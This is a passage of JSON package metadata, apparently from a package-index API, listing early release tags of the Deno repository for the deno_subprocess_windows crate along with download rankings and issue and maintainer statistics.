v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T12:39:36.264Z","dependent_packages_count":0,"downloads":84369,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":94.79779564100438,"dependent_repos_count":21.322097455871386,"dependent_packages_count":28.234544625839064,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":48.11814590757161},"purl":"pkg:cargo/deno_subprocess_windows","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_subprocess_windows","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_subprocess_windows","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_subprocess_windows/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/l